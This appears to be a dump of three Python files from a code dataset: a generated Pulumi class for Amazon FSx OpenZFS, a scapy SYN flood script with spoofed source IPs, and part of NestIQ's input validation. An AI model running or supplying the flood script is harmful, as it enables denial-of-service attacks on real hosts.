@pulumi.getter(name="throughputCapacity")
def throughput_capacity(self) -> Optional[pulumi.Input[int]]:
"""
Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
"""
return pulumi.get(self, "throughput_capacity")
@throughput_capacity.setter
def throughput_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput_capacity", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> Optional[pulumi.Input[str]]:
"""
Identifier of the Virtual Private Cloud for the file system.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_id", value)
@property
@pulumi.getter(name="weeklyMaintenanceStartTime")
def weekly_maintenance_start_time(self) -> Optional[pulumi.Input[str]]:
"""
The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
return pulumi.get(self, "weekly_maintenance_start_time")
@weekly_maintenance_start_time.setter
def weekly_maintenance_start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "weekly_maintenance_start_time", value)
class OpenZfsFileSystem(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an Amazon FSx for OpenZFS file system.
See the [FSx OpenZFS User Guide](https://docs.aws.amazon.com/fsx/latest/OpenZFSGuide/what-is-fsx.html) for more information.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
test = aws.fsx.OpenZfsFileSystem("test",
storage_capacity=64,
subnet_ids=[aws_subnet["test1"]["id"]],
deployment_type="SINGLE_AZ_1",
throughput_capacity=64)
```
## Import
FSx File Systems can be imported using the `id`, e.g.,
```sh
$ pulumi import aws:fsx/openZfsFileSystem:OpenZfsFileSystem example fs-543ab12b1ca672f33
```
Certain resource arguments, like `security_group_ids`, do not have an FSx API method for reading the information after creation. If the argument is set in the Terraform configuration on an imported resource, Terraform will always show a difference. To work around this behavior, either omit the argument from the Terraform configuration or use [`ignore_changes`](https://www.terraform.io/docs/configuration/meta-arguments/lifecycle.html#ignore_changes) to hide the difference, e.g., in Terraform:

resource "aws_fsx_openzfs_file_system" "example" {
  # ... other configuration ...
  security_group_ids = [aws_security_group.example.id]

  # There is no FSx API for reading security_group_ids
  lifecycle {
    ignore_changes = [security_group_ids]
  }
}
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input[str] deployment_type: The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration below.
:param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest. Defaults to an AWS managed KMS Key.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children of the root volume. See Root Volume Configuration below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values are between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
:param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet needs to be provided.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: OpenZfsFileSystemArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Amazon FSx for OpenZFS file system.
See the [FSx OpenZFS User Guide](https://docs.aws.amazon.com/fsx/latest/OpenZFSGuide/what-is-fsx.html) for more information.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
test = aws.fsx.OpenZfsFileSystem("test",
storage_capacity=64,
subnet_ids=[aws_subnet["test1"]["id"]],
deployment_type="SINGLE_AZ_1",
throughput_capacity=64)
```
## Import
FSx File Systems can be imported using the `id`, e.g.,
```sh
$ pulumi import aws:fsx/openZfsFileSystem:OpenZfsFileSystem example fs-543ab12b1ca672f33
```
Certain resource arguments, like `security_group_ids`, do not have an FSx API method for reading the information after creation. If the argument is set in the Terraform configuration on an imported resource, Terraform will always show a difference. To work around this behavior, either omit the argument from the Terraform configuration or use [`ignore_changes`](https://www.terraform.io/docs/configuration/meta-arguments/lifecycle.html#ignore_changes) to hide the difference, e.g., in Terraform:

resource "aws_fsx_openzfs_file_system" "example" {
  # ... other configuration ...
  security_group_ids = [aws_security_group.example.id]

  # There is no FSx API for reading security_group_ids
  lifecycle {
    ignore_changes = [security_group_ids]
  }
}
:param str resource_name: The name of the resource.
:param OpenZfsFileSystemArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(OpenZfsFileSystemArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OpenZfsFileSystemArgs.__new__(OpenZfsFileSystemArgs)
__props__.__dict__["automatic_backup_retention_days"] = automatic_backup_retention_days
__props__.__dict__["backup_id"] = backup_id
__props__.__dict__["copy_tags_to_backups"] = copy_tags_to_backups
__props__.__dict__["copy_tags_to_volumes"] = copy_tags_to_volumes
__props__.__dict__["daily_automatic_backup_start_time"] = daily_automatic_backup_start_time
if deployment_type is None and not opts.urn:
raise TypeError("Missing required property 'deployment_type'")
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["disk_iops_configuration"] = disk_iops_configuration
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["root_volume_configuration"] = root_volume_configuration
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["storage_capacity"] = storage_capacity
__props__.__dict__["storage_type"] = storage_type
if subnet_ids is None and not opts.urn:
raise TypeError("Missing required property 'subnet_ids'")
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
if throughput_capacity is None and not opts.urn:
raise TypeError("Missing required property 'throughput_capacity'")
__props__.__dict__["throughput_capacity"] = throughput_capacity
__props__.__dict__["weekly_maintenance_start_time"] = weekly_maintenance_start_time
__props__.__dict__["arn"] = None
__props__.__dict__["dns_name"] = None
__props__.__dict__["network_interface_ids"] = None
__props__.__dict__["owner_id"] = None
__props__.__dict__["root_volume_id"] = None
__props__.__dict__["vpc_id"] = None
super(OpenZfsFileSystem, __self__).__init__(
'aws:fsx/openZfsFileSystem:OpenZfsFileSystem',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
network_interface_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
owner_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']]] = None,
root_volume_id: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None) -> 'OpenZfsFileSystem':
"""
Get an existing OpenZfsFileSystem resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: Amazon Resource Name of the file system.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input[str] deployment_type: The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration below.
:param pulumi.Input[str] dns_name: DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
:param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest. Defaults to an AWS managed KMS Key.
:param pulumi.Input[Sequence[pulumi.Input[str]]] network_interface_ids: Set of Elastic Network Interface identifiers from which the file system is accessible. The first network interface returned is the primary network interface.
:param pulumi.Input[str] owner_id: AWS account identifier that created the file system.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children of the root volume. See Root Volume Configuration below.
:param pulumi.Input[str] root_volume_id: Identifier of the root volume, e.g., `fsvol-12345678`
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values are between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
:param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet needs to be provided.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[str] vpc_id: Identifier of the Virtual Private Cloud for the file system.
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _OpenZfsFileSystemState.__new__(_OpenZfsFileSystemState)
__props__.__dict__["arn"] = arn
__props__.__dict__["automatic_backup_retention_days"] = automatic_backup_retention_days
__props__.__dict__["backup_id"] = backup_id
__props__.__dict__["copy_tags_to_backups"] = copy_tags_to_backups
__props__.__dict__["copy_tags_to_volumes"] = copy_tags_to_volumes
__props__.__dict__["daily_automatic_backup_start_time"] = daily_automatic_backup_start_time
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["disk_iops_configuration"] = disk_iops_configuration
__props__.__dict__["dns_name"] = dns_name
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["network_interface_ids"] = network_interface_ids
__props__.__dict__["owner_id"] = owner_id
__props__.__dict__["root_volume_configuration"] = root_volume_configuration
__props__.__dict__["root_volume_id"] = root_volume_id
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["storage_capacity"] = storage_capacity
__props__.__dict__["storage_type"] = storage_type
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
__props__.__dict__["throughput_capacity"] = throughput_capacity
__props__.__dict__["vpc_id"] = vpc_id
__props__.__dict__["weekly_maintenance_start_time"] = weekly_maintenance_start_time
return OpenZfsFileSystem(resource_name, opts=opts, __props__=__props__)
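    # Usage sketch (illustrative, not part of the generated SDK): adopting an
    # existing file system by its FSx ID. "fs-0123456789abcdef0" is a
    # placeholder identifier.
    #
    #   existing = OpenZfsFileSystem.get("existing", id="fs-0123456789abcdef0")
    #   pulumi.export("dnsName", existing.dns_name)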
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
Amazon Resource Name of the file system.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="automaticBackupRetentionDays")
def automatic_backup_retention_days(self) -> pulumi.Output[Optional[int]]:
"""
The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
"""
return pulumi.get(self, "automatic_backup_retention_days")
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the source backup to create the filesystem from.
"""
return pulumi.get(self, "backup_id")
@property
@pulumi.getter(name="copyTagsToBackups")
def copy_tags_to_backups(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_backups")
@property
@pulumi.getter(name="copyTagsToVolumes")
def copy_tags_to_volumes(self) -> pulumi.Output[Optional[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_volumes")
@property
@pulumi.getter(name="dailyAutomaticBackupStartTime")
def daily_automatic_backup_start_time(self) -> pulumi.Output[str]:
"""
A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
"""
return pulumi.get(self, "daily_automatic_backup_start_time")
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Output[str]:
"""
The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
"""
return pulumi.get(self, "deployment_type")
@property
@pulumi.getter(name="diskIopsConfiguration")
def disk_iops_configuration(self) -> pulumi.Output['outputs.OpenZfsFileSystemDiskIopsConfiguration']:
"""
The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration below.
"""
return pulumi.get(self, "disk_iops_configuration")
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> pulumi.Output[str]:
"""
DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
"""
return pulumi.get(self, "dns_name")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> pulumi.Output[str]:
"""
ARN for the KMS Key to encrypt the file system at rest. Defaults to an AWS managed KMS Key.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="networkInterfaceIds")
def network_interface_ids(self) -> pulumi.Output[Sequence[str]]:
"""
Set of Elastic Network Interface identifiers from which the file system is accessible. The first network interface returned is the primary network interface.
"""
return pulumi.get(self, "network_interface_ids")
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> pulumi.Output[str]:
"""
AWS account identifier that created the file system.
"""
return pulumi.get(self, "owner_id")
@property
@pulumi.getter(name="rootVolumeConfiguration")
def root_volume_configuration(self) -> pulumi.Output['outputs.OpenZfsFileSystemRootVolumeConfiguration']:
"""
The configuration for the root volume of the file system. All other volumes are children of the root volume. See Root Volume Configuration below.
"""
return pulumi.get(self, "root_volume_configuration")
@property
@pulumi.getter(name="rootVolumeId")
def root_volume_id(self) -> pulumi.Output[str]:
"""
Identifier of the root volume, e.g., `fsvol-12345678`
"""
return pulumi.get(self, "root_volume_id")
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
"""
return pulumi.get(self, "security_group_ids")
@property
@pulumi.getter(name="storageCapacity")
def storage_capacity(self) -> pulumi.Output[Optional[int]]:
"""
The storage capacity (GiB) of the file system. Valid values are between `64` and `524288`.
"""
return pulumi.get(self, "storage_capacity")
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> pulumi.Output[Optional[str]]:
"""
The filesystem storage type. Only `SSD` is supported.
"""
return pulumi.get(self, "storage_type")
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> pulumi.Output[str]:
"""
A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet needs to be provided.
"""
return pulumi.get(self, "subnet_ids")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@property
@pulumi.getter(name="throughputCapacity")
def throughput_capacity(self) -> pulumi.Output[int]:
"""
Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
"""
return pulumi.get(self, "throughput_capacity")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Output[str]:
"""
Identifier of the Virtual Private Cloud for the file system.
"""
return pulumi.get(self, "vpc_id")
@property
@pulumi.getter(name="weeklyMaintenanceStartTime")
def weekly_maintenance_start_time(self) -> pulumi.Output[str]:
"""
The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
return pulumi.get(self, "weekly_maintenance_start_time")
avg_line_length: 56.30131 | max_line_length: 550 | alphanum_fraction: 0.694982
count_classes: 63983 (score 0.992523) | count_generators: 0 (score 0) | count_decorators: 59088 (score 0.91659) | count_async_functions: 0 (score 0) | count_documentation: 33779 (score 0.52399)

hexsha: 8bc5033e6745dd8bddb7a355569fc61f7cd99932 | size: 1410 | ext: py | lang: Python
max_stars: repo_path: tools/other/syn.py | repo_name: fengjixuchui/geospy | head_hexsha: 12ff83372a7e128babd8f16c357672d1495022c8 | licenses: ["MIT"] | count: 1 | events: 2019-11-12T05:53:25.000Z to 2019-11-12T05:53:25.000Z
max_issues: repo_path: tools/other/syn.py | repo_name: fengjixuchui/geospy | head_hexsha: 12ff83372a7e128babd8f16c357672d1495022c8 | licenses: ["MIT"] | count: null | events: null to null
max_forks: repo_path: tools/other/syn.py | repo_name: fengjixuchui/geospy | head_hexsha: 12ff83372a7e128babd8f16c357672d1495022c8 | licenses: ["MIT"] | count: null | events: null to null
#!/usr/bin/env python3
import random
import time
from scapy.all import IP, TCP, send
from threading import Thread
# Import modules for SYN flood
import tools.randomData as randomData
def SYN_ATTACK(threads, attack_time, target):
# Shared flag used to signal worker threads to stop
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting SYN attack...")
threads_list = []
# SYN flood
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" SYN packet was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = syn_flood)
t.start()
threads_list.append(t)
# Sleep for the selected number of seconds
time.sleep(attack_time)
# Signal all threads to stop, then wait for them to finish
FINISH = True
for thread in threads_list:
    thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
avg_line_length: 23.114754 | max_line_length: 78 | alphanum_fraction: 0.668085
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 334 (score 0.236879)

hexsha: 8bc5c14508eaa101207214cbf9fa6cdfc7a9bf62 | size: 19405 | ext: py | lang: Python
max_stars: repo_path: NIQ_uncompiled/source_code/check_valid.py | repo_name: wxhawkins/NestIQ | head_hexsha: 3a004d330e2c68b0c7eb0b0676bc4d044e52cbe4 | licenses: ["Apache-2.0"] | count: null | events: null to null
max_issues: repo_path: NIQ_uncompiled/source_code/check_valid.py | repo_name: wxhawkins/NestIQ | head_hexsha: 3a004d330e2c68b0c7eb0b0676bc4d044e52cbe4 | licenses: ["Apache-2.0"] | count: null | events: null to null
max_forks: repo_path: NIQ_uncompiled/source_code/check_valid.py | repo_name: wxhawkins/NestIQ | head_hexsha: 3a004d330e2c68b0c7eb0b0676bc4d044e52cbe4 | licenses: ["Apache-2.0"] | count: null | events: null to null
import time
import datetime as dt
from pathlib import Path
from tkinter import messagebox
import re
import niq_misc
import math
import traceback
from niq_misc import replace_entry
def check_valid_vertex_file(gui):
"""
Checks user-provided vertex selection file (HTML) for issues that could cause errors with
downstream processes.
Returns:
True if file passes all tests, else displays error message and returns False
"""
niq_misc.remove_curly(gui.vertex_file_E)
vertex_path = Path(gui.vertex_file_E.get())
# Check if path is empty
if vertex_path.name == "":
messagebox.showerror("Vertex File Error", "Please provide a vertex file.")
return False
# Check if path has invalid path
if vertex_path.suffix not in (".html", ""):
messagebox.showerror("Vertex Selection Error", r'Vertex selection file must have ".html" extension.')
return False
# Check if path exists
if not vertex_path.exists():
messagebox.showerror("Vertex Selection Error", "Provided vertex selection file not found.")
return False
with open(vertex_path, "r") as original_file:
original_lines = original_file.readlines()
# Remove extra table data lines if present
cleaned_content = str()
found = False
for line in original_lines:
if "<div class" in line:
found = True
if found:
cleaned_content += line
# Get datapoints
tokens = re.finditer(r">([\d\.-]+)</span>", cleaned_content)
token_num = 0
try:
# Every other value in tokens will be temperature and so is ignored
for counter, match in enumerate(tokens):
token_num = counter
if not (counter % 2) == 0:
round(float(match.group(1)))
except:
messagebox.showerror(("Vertex File Error"), "Vertex file is unreadable. Please try another.")
return False
if token_num < 2:
messagebox.showerror(
"Vertex File Error",
"No vertices detected in vertex file.\n\n" +
'When saving plots, ensure the file type option is set to \"Webpage, Complete\" not \"Webpage, HTML only\".'
)
return False
return True
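# Note (illustrative): the pattern r">([\d\.-]+)</span>" above captures the numeric
# payload of spans such as "<span ...>25</span><span ...>36.5</span>". Per the
# comment in the loop, matches alternate between two kinds of values (every other
# one is a temperature), which is why only every other token is converted and checked.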
def check_valid_main(gui, first_in=True, check_output=True):
"""
Checks for valid configuration of all parameters housed on the Main tab. This includes extensive
review of the input file provided.
Args:
first_in (bool): False if current file is second or later in a queue of multiple input files
check_output (bool): if False, output file names are not examined
"""
def check_input_file(gui):
"""
Checks several aspects of the input file to ensure it is compatible with all downstream processing.
Also displays warnings for less severe format violations.
"""
def check_datetime_intervals():
""" Sets time interval between temperature readings and checks for gaps in date/time column. """
delta_secs = (datetimes[-1] - datetimes[0]).total_seconds()
interval = dt.timedelta(seconds=round(delta_secs / len(master_list)))
if not gui.show_warns_BV.get():
return True
# If interval is greater than or equal to one minute
if interval.seconds >= 60:
i = 1
while i < len(datetimes):
if datetimes[i - 1] + interval != datetimes[i]:
messagebox.showwarning(
"Date/time Warning",
f"{file_name_appendage}Discontinuous date/time found for data point {master_list[i][0]}." +
"The run will continue, but this could cause inaccurate statistical output.",
)
i += 1
return True
# If interval is less than one minute
# Identify first change in date/time
i = 0
while datetimes[i] == datetimes[0]:
i += 1
# Find the least common multiple (in seconds) of the reading interval and one minute
LCD = abs(interval.seconds*60) // math.gcd(interval.seconds, 60)
dp_leap = int(LCD / interval.seconds) # There should be a whole number minute change after this many data points
min_leap = dt.timedelta(minutes=int(LCD / 60)) # That whole number of minutes is this
i += dp_leap
while i < len(datetimes):
if datetimes[i - dp_leap] + min_leap != datetimes[i]:
messagebox.showwarning(
"Date/time Warning",
f"{file_name_appendage}Discontinuous date/time found for data point {master_list[i][0]}." +
"The run will continue, but this could cause inaccurate statistical output.",
)
i += dp_leap
return True
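        # Worked example (illustrative) for the sub-minute branch above: with a
        # reading every 24 seconds, LCM(24, 60) = 120 seconds, so dp_leap = 120 / 24 = 5
        # data points and min_leap = 2 minutes; every 5th reading is expected to land
        # exactly 2 minutes after its counterpart.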
in_file_path = gui.active_input_path
file_name_appendage = f"For file: {in_file_path.name} \n\n"
